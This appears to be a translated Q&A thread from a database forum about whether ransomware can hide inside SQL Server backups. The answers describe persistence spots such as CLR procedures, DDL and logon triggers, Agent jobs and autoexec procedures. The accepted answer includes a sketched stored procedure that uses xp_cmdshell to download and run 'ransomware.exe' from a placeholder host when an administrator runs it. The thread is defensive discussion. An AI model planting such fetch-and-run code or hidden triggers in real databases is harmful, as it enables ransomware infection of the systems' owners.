AskOverflow.Dev

AskOverflow.Dev Logo AskOverflow.Dev Logo

AskOverflow.Dev Navigation

  • Início
  • system&network
  • Ubuntu
  • Unix
  • DBA
  • Computer
  • Coding
  • LangChain

Mobile menu

Close
  • Início
  • system&network
    • Recentes
    • Highest score
    • tags
  • Ubuntu
    • Recentes
    • Highest score
    • tags
  • Unix
    • Recentes
    • tags
  • DBA
    • Recentes
    • tags
  • Computer
    • Recentes
    • tags
  • Coding
    • Recentes
    • tags
Início / dba / Perguntas / 312008
Accepted
icecurtain
icecurtain
Asked: 2022-05-12 12:50:20 +0800 CST2022-05-12 12:50:20 +0800 CST 2022-05-12 12:50:20 +0800 CST

O ransomware pode se incorporar a um arquivo de backup SQL?

  • 772

Uma das melhores proteções contra ransomware é fazer backup de todos os seus arquivos de banco de dados em um sistema completamente separado. O que temos feito.

Mas um pensamento é que o backup do banco de dados poderia agora conter o ransomware. Isso é possível? Este é um .bak criado nativo do SQL Server de 2016. Ou é impossível que o ransomware se incorpore em um arquivo de backup?

sql-server sql-server-2016
  • 5 5 respostas
  • 3378 Views

5 respostas

  • Voted
  1. pmdba
    2022-05-12T14:44:04+08:002022-05-12T14:44:04+08:00

    Nunca diga nunca , mas como os backups não são arquivos executáveis ​​e não contêm código executável diretamente (eles são sobre os dados, não o próprio software SQL Server), acho que o risco é muito, muito baixo. Seria mais provável que seus arquivos de backup fossem o alvo do ramsomware e não o agente da infecção. Qualquer coisa executável teria que ser executável de dentro do banco de dados, como um procedimento armazenado. Existem maneiras muito mais efetivas e diretas para o ransomware se espalhar.

    • 22
  2. Brendan McCaffrey
    2022-05-12T14:55:47+08:002022-05-12T14:55:47+08:00

    O que você normalmente precisa se preocupar é que o ransomware encontre seus backups na rede e os criptografe. Quando o ransomware atinge sua rede, ele normalmente se propaga rapidamente e bloqueia tudo o que pode encontrar. Se o ransomware obtiver privilégios de administrador de domínio, isso normalmente acontece em questão de minutos.

    Na pior das hipóteses, o ransomware coloca seu servidor de banco de dados offline e criptografa todos os backups também. Se você não tiver cópias offline de seus backups, pode ser um desafio, se não impossível, recuperá-los. Para se proteger verdadeiramente, certifique-se de manter cópias offline de seus backups.

    • 12
  3. Best Answer
    Joshua
    2022-05-13T12:34:49+08:002022-05-13T12:34:49+08:00

    Sim. Eu nunca vi isso embora.

    SQL Server tem um recurso onde você pode escrever procedimentos armazenados em C#. Nós pensamos em usá-lo uma vez. A partir de algumas versões atrás, esse recurso está desativado por padrão.

    Portanto, se o ransomware ativar o recurso e converter alguns procedimentos armazenados em C# e se adicionar, quando você restaurar o backup, receberá um erro ao tentar usar esses procedimentos armazenados e provavelmente ativá-lo. Em seguida, o código C# será executado.

    Agora aqui é onde fica suculento. Houve tantas vulnerabilidades de escape de sandbox que a MS desistiu e preteriu o Silverlight e desativou os procedimentos armazenados do .NET no SQL Server por padrão. Seria desaconselhável supor que, só porque você não consegue encontrar um que funcione hoje, não resta mais nada.

    Um ataque um pouco mais realista seria modificar um SP que faz algo ao longo das linhas de

    IF (session is admin)
    BEGIN
        -- xp_cmdshell is off by default but this is a speed bump; SQL can just turn it on
        -- I've done it before because I had to put up with surface area configuration broken, but I'm not writing it here
        xp_cmdshell 'powershell wget https://badsite.com/ransomware.exe'
        xp_cmdhsell 'ransomware.exe'
    END
    

    e então é só esperar que algum administrador de sistema o execute. Os backups restaurados em instâncias temporárias raramente são usados ​​por usuários devidamente restritos. Por outro lado, o referido ransomeware precisará ser bastante semelhante a um worm para obter qualquer coisa que não possa ser simplesmente apagada.

    • 5
  4. Charlieface
    2022-05-13T21:02:54+08:002022-05-13T21:02:54+08:00

    Além da resposta de @Joshua nos procedimentos SQLCLR, existem outros lugares em que vírus e ransomware podem se infiltrar:

    • Acionadores DDL em nível de banco de dados, que teriam o benefício de serem executados por um DBA, que provavelmente possui sadireitos.

    Isso leva a alguns lugares mais perniciosos:

    • O msdbbanco de dados, em particular as tabelas de Trabalhos do SQL Server Agent, onde ele pode configurar um trabalho agendado para ser executado em intervalos específicos. Isso pode ser em T-SQL ou em Powershell.
    • Ele pode entrar no banco de masterdados. Se ele entrou aqui, existem alguns lugares diferentes que ele pode se esconder:
      • Ele pode definir um gatilho DDL, o mesmo que qualquer outro banco de dados.
      • Ele poderia definir um gatilho de logon, que seria executado toda vez que alguém fizer logon, que acho que é executado como sa.
      • Ele pode configurar um procedimento de Execução Automática, que é executado em cada inicialização. Isso é feito com o sp_procoptionprocedimento do sistema .
    • Ele poderia entrar em tempdb, onde poderia configurar um gatilho DDL para disparar toda vez que uma tabela temporária fosse criada. tempdbnão é feito backup embora.
    • Ele pode se esconder no modelbanco de dados, pronto para aparecer na próxima vez que você criar um novo banco de dados.

    Nenhuma dessas coisas é possível se as permissões nesses bancos de dados não forem alteradas e o vírus nunca obter sysadmindireitos, o que reconhecidamente é difícil de evitar.

    Observe também que a conta sob a qual o SQL Server é executado deve ser uma conta de serviço limitada em vez de SYSTEM, o que impediria um comprometimento completo do sistema operacional do servidor se o SQL Server fosse comprometido da maneira acima.

    Observe ainda que, se houver um comprometimento do sistema operacional até o sunível Administrador/, considere todos os locais do SQL Server acima como suspeitos. A melhor prática seria construir os bancos de dados do sistema do zero.

    • 5
  5. Guntram Blohm
    2022-05-13T00:55:45+08:002022-05-13T00:55:45+08:00

    Geralmente, o ransomware é executado como um programa em seu sistema operacional, criptografa arquivos (possivelmente dependendo do tipo de arquivo) e, se você tiver sorte, não deixa bombas-relógio em arquivos exe descriptografados posteriormente.

    No entanto, o ransomware pode direcionar diretamente um banco de dados, embora eu não tenha conhecimento de nenhum que faça isso (ainda). Isso provavelmente seria um ataque direcionado, não geral, pois os ataques gerais tentam encontrar o maior número possível de alvos e há muito mais servidores/PCs gerais do que servidores de banco de dados.

    Se eu quisesse escrever algum ransomware para atingir você diretamente, escreveria um procedimento armazenado e o anexaria a um gatilho em algum lugar. Faça com que o procedimento armazenado não faça nada por uma ou duas semanas após a infecção, para garantir que os backups atuais também contenham o procedimento armazenado. Após duas semanas, o procedimento armazenado começaria a criptografar suas tabelas de banco de dados. Faça uma cópia criptografada de cada tabela, o que levaria um tempo, e então elimine as tabelas originais, e nesse ponto você notará que algo está errado.

    Nesse cenário, todos os seus backups completos teriam o procedimento armazenado e o acionador também, portanto, após a restauração de um backup, seu banco de dados pareceria normal por um tempo, até que o acionador fosse acionado novamente.

    Obviamente, o procedimento armazenado normalmente não seria capaz de acessar seu sistema de arquivos (mas cuidado com bancos de dados que permitem acesso ao sistema de arquivos), mas um banco de dados que se torna inutilizável a cada poucos dias é ruim o suficiente para sua organização.

    Se você puder fazer uma instalação limpa do seu software e criar um banco de dados vazio de acordo com as especificações do fornecedor, restaurar apenas os dados da tabela (basicamente, uma restauração que contém apenas DML, sem instruções DDL), você se livrará de o ransomware.

    • 2

relate perguntas

  • SQL Server - Como as páginas de dados são armazenadas ao usar um índice clusterizado

  • Preciso de índices separados para cada tipo de consulta ou um índice de várias colunas funcionará?

  • Quando devo usar uma restrição exclusiva em vez de um índice exclusivo?

  • Quais são as principais causas de deadlocks e podem ser evitadas?

  • Como determinar se um Índice é necessário ou necessário

Sidebar

Stats

  • Perguntas 205573
  • respostas 270741
  • best respostas 135370
  • utilizador 68524
  • Highest score
  • respostas
  • Marko Smith

    conectar ao servidor PostgreSQL: FATAL: nenhuma entrada pg_hba.conf para o host

    • 12 respostas
  • Marko Smith

    Como fazer a saída do sqlplus aparecer em uma linha?

    • 3 respostas
  • Marko Smith

    Selecione qual tem data máxima ou data mais recente

    • 3 respostas
  • Marko Smith

    Como faço para listar todos os esquemas no PostgreSQL?

    • 4 respostas
  • Marko Smith

    Listar todas as colunas de uma tabela especificada

    • 5 respostas
  • Marko Smith

    Como usar o sqlplus para se conectar a um banco de dados Oracle localizado em outro host sem modificar meu próprio tnsnames.ora

    • 4 respostas
  • Marko Smith

    Como você mysqldump tabela (s) específica (s)?

    • 4 respostas
  • Marko Smith

    Listar os privilégios do banco de dados usando o psql

    • 10 respostas
  • Marko Smith

    Como inserir valores em uma tabela de uma consulta de seleção no PostgreSQL?

    • 4 respostas
  • Marko Smith

    Como faço para listar todos os bancos de dados e tabelas usando o psql?

    • 7 respostas
  • Martin Hope
    Jin conectar ao servidor PostgreSQL: FATAL: nenhuma entrada pg_hba.conf para o host 2014-12-02 02:54:58 +0800 CST
  • Martin Hope
    Stéphane Como faço para listar todos os esquemas no PostgreSQL? 2013-04-16 11:19:16 +0800 CST
  • Martin Hope
    Mike Walsh Por que o log de transações continua crescendo ou fica sem espaço? 2012-12-05 18:11:22 +0800 CST
  • Martin Hope
    Stephane Rolland Listar todas as colunas de uma tabela especificada 2012-08-14 04:44:44 +0800 CST
  • Martin Hope
    haxney O MySQL pode realizar consultas razoavelmente em bilhões de linhas? 2012-07-03 11:36:13 +0800 CST
  • Martin Hope
    qazwsx Como posso monitorar o andamento de uma importação de um arquivo .sql grande? 2012-05-03 08:54:41 +0800 CST
  • Martin Hope
    markdorison Como você mysqldump tabela (s) específica (s)? 2011-12-17 12:39:37 +0800 CST
  • Martin Hope
    Jonas Como posso cronometrar consultas SQL usando psql? 2011-06-04 02:22:54 +0800 CST
  • Martin Hope
    Jonas Como inserir valores em uma tabela de uma consulta de seleção no PostgreSQL? 2011-05-28 00:33:05 +0800 CST
  • Martin Hope
    Jonas Como faço para listar todos os bancos de dados e tabelas usando o psql? 2011-02-18 00:45:49 +0800 CST

Hot tag

sql-server mysql postgresql sql-server-2014 sql-server-2016 oracle sql-server-2008 database-design query-performance sql-server-2017

Explore

  • Início
  • Perguntas
    • Recentes
    • Highest score
  • tag
  • help

Footer

AskOverflow.Dev

About Us

  • About Us
  • Contact Us

Legal Stuff

  • Privacy Policy

Language

  • Pt
  • Server
  • Unix

© 2023 AskOverflow.DEV All Rights Reserve